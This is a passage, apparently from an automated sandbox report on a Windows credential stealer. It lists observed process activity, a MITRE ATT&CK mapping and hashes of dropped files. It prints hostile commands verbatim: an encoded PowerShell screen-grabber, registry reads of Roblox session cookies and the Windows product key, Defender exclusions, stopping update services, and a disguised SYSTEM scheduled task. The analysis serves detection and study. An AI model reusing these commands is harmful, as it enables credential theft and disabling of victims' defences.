ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        8⤵
        
        PID:6520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6440
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yeec0hb2\yeec0hb2.cmdline"
        10⤵
        
        PID:7632
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2C3.tmp" "c:\Users\Admin\AppData\Local\Temp\yeec0hb2\CSCF28452DF123643CD8FAF4EBE74FB9C8B.TMP"
        11⤵
        
        PID:8288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:392
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7324
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7488
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7612
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7764
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:5300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:6512
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:6468
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:7664
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:7444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        8⤵
        
        PID:8536
        
        C:\Windows\system32\getmac.exe
        
        getmac
        9⤵
        
        PID:8572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:9204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        
        PID:7816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        8⤵
        
        PID:8108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        
        PID:7124
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\stnvp.zip" *"
        8⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\_MEI14802\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI14802\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\stnvp.zip" *
        9⤵
        
        PID:9188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        8⤵
        
        PID:6396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:6236
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        9⤵
        
        PID:6176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        8⤵
        
        PID:7616
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        9⤵
        
        PID:7520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        8⤵
        
        PID:5712
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        9⤵
        
        PID:6300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        8⤵
        
        PID:6224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        
        PID:4948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        8⤵
        
        PID:7868
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:6456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        8⤵
        
        PID:8616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        9⤵
        
        PID:7900

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2752
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:1468
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.0.608845308\71979868" -parentBuildID 20230214051806 -prefsHandle 1748 -prefMapHandle 1740 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6684758-8023-4248-ba0a-a46c92e34f01} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 1844 13f3c724658 gpu
    3⤵
    PID:5116
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.1.1470820163\1463034213" -parentBuildID 20230214051806 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c21db0d7-0906-4f37-a0fe-12b496b9b379} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 2396 13f2fb85f58 socket
    3⤵
    PID:2884
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.2.2100548692\634704738" -childID 1 -isForBrowser -prefsHandle 3136 -prefMapHandle 2792 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 1068 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {952528a3-1b55-4554-ad2e-0b9ef8ed3eca} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 2776 13f3b794d58 tab
    3⤵
    PID:4396
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.3.1472903305\366931886" -childID 2 -isForBrowser -prefsHandle 3456 -prefMapHandle 3452 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1068 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6b814b3-b723-46e8-a198-42223fe3127c} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 3768 13f2fb76b58 tab
    3⤵
    PID:5136
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.4.1417939028\878435779" -childID 3 -isForBrowser -prefsHandle 4796 -prefMapHandle 5012 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1068 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1411642d-da84-4e9c-a650-27b4666016a9} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5068 13f442d2b58 tab
    3⤵
    PID:5928
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.5.316537138\711120575" -childID 4 -isForBrowser -prefsHandle 5192 -prefMapHandle 5196 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1068 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4a179ba-50ea-4f78-a630-e80cabee54c5} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5184 13f442d2e58 tab
    3⤵
    PID:5952
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.6.355863776\57958665" -childID 5 -isForBrowser -prefsHandle 5380 -prefMapHandle 5384 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1068 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {057883cb-576d-4d39-8f76-7b895cb2ec28} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5372 13f442d1358 tab
    3⤵
    PID:5968
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1468.7.2112785580\429574300" -childID 6 -isForBrowser -prefsHandle 4860 -prefMapHandle 3904 -prefsLen 27774 -prefMapSize 235121 -jsInitHandle 1068 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fc49993-a128-453b-a910-756eaacbca47} 1468 "\\.\pipe\gecko-crash-server-pipe.1468" 5816 13f446b5058 tab
    3⤵
    PID:6248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
- Command and Scripting Interpreter: PowerShell
PID:6408

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:3112
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:8312
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6452
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:6164
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:6448
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:1892

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:7080

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:6112

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yntnomxcupkb.xml"
1⤵
- Creates scheduled task(s)
PID:7240

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:9304

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:9576
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:14656

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:9268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5276

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:15332
- C:\Windows\System32\sc.exe
  sc stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:14412
- C:\Windows\System32\sc.exe
  sc stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:14432
- C:\Windows\System32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:5500
- C:\Windows\System32\sc.exe
  sc stop bits
  2⤵
  - Launches sc.exe
  PID:6080
- C:\Windows\System32\sc.exe
  sc stop dosvc
  2⤵
  - Launches sc.exe
  PID:14492

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\yntnomxcupkb.xml"
1⤵
- Creates scheduled task(s)
PID:14676

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:15112

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
1⤵
PID:9108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\based.exe

Filesize
6.9MB

MD5
a71fc3ca1bd1af148ee4c1bfabcbe0da

SHA1
bbaf078956d577d05ab1cac41cc530c1e780478d

SHA256
4f9f2637c579b3c01c0031926bd29d3774d4d9435d70e8c7c2d17aeba81e2441

SHA512
ee4ee30004404a10da6eb1c468df1f905bd20ed4b9139e477563eb998243764f7a54d20e7980b029a3b28d4774b695b8eb21d143c1cdb6fd7401cc001c863f35

Download Submit
C:\ProgramData\Microsoft\hacn.exe

Filesize
24.0MB

MD5
b9f3e6e06f33ee7078f514d41be5faad

SHA1
e2d35bc333ec6ff0f6ae60e55daca44a433fc279

SHA256
a7c3208cf3067d1da12542cab16516c9085620959deb60dd000e190f15c74758

SHA512
212a6540082a20de6798d53e2c6f7f5705e5e4164620aa7f08a366e747f240c59c4c70ce0b8dd00625a0a960d1615073b4e48b2707abe767b422f732c5927bed

Download Submit
C:\ProgramData\main.exe

Filesize
5.6MB

MD5
5df3e2c717f267899f37ec6e8fc7f47a

SHA1
5e980079f67215bf69b8c1c16b56f40bf4a29958

SHA256
e3f5c557ece7ec27cb7e4a26482eadf0d9065065d94b2919f9b881bc74800e6e

SHA512
8cef1184120e010421d69fcf271822b3f0b45e34a1565152a3f2decb8f500d0e69de9816d9075683fcfb0f431713f3fbc42ac2d87503cdcdde125aba3fa1635d

Download Submit
C:\ProgramData\setup.exe

Filesize
5.4MB

MD5
1274cbcd6329098f79a3be6d76ab8b97

SHA1
53c870d62dcd6154052445dc03888cdc6cffd370

SHA256
bbe5544c408a6eb95dd9980c61a63c4ebc8ccbeecade4de4fae8332361e27278

SHA512
a0febbd4915791d3c32531fb3cf177ee288dd80ce1c8a1e71fa9ad59a4ebddeef69b6be7f3d19e687b96dc59c8a8fa80afff8378a71431c3133f361b28e0d967

Download Submit
C:\ProgramData\svchost.exe

Filesize
12.0MB

MD5
48b277a9ac4e729f9262dd9f7055c422

SHA1
d7e8a3fa664e863243c967520897e692e67c5725

SHA256
5c832eda59809a4f51dc779bb00bd964aad42f2597a1c9f935cfb37f0888ef17

SHA512
66dd4d1a82103cd90c113df21eb693a2bffde2cde41f9f40b5b85368d5a920b66c3bc5cadaf9f9d74dfd0f499086bedd477f593184a7f755b7b210ef5e428941

Download Submit
C:\ProgramData\шева.txt

Filesize
14B

MD5
1207bc197a1ebd72a77f1a771cad9e52

SHA1
8ed121ff66d407150d7390b9276fe690dd213b27

SHA256
260658b9cb063d6ce96f681b18704e02fae7bf8fc995fc249ab0be1400983476

SHA512
d037cfa3b6e6ced9652b2c781bb54cf48dbaa0aaff05039ae4fd0122749eda472807d4198981aa6ceffeba6d2b23d7ad08d7d96983dbd8539cf6b07e46e157f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
14KB

MD5
4781f541872233aa0659be6d586f8eb0

SHA1
d7b7bc63bf33c38e43b6614beea4dabdd7668af4

SHA256
052a2dc311400e037875f85baeb4e8d03817d3fce65d146cb1eb899000e4ab5f

SHA512
0660301b67667652933229d3a8bf5300511d4176e33eb459aedf44e2362244c79cdb5a173b545e7bdeacc26df80c141536d30d9fd1ae85395ca6623e8a02bb66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

Filesize
14KB

MD5
aeac3cadc3fcf8df6407fb77752782a8

SHA1
855d0a83f97a34315851c114cb374b53ce7f7935

SHA256
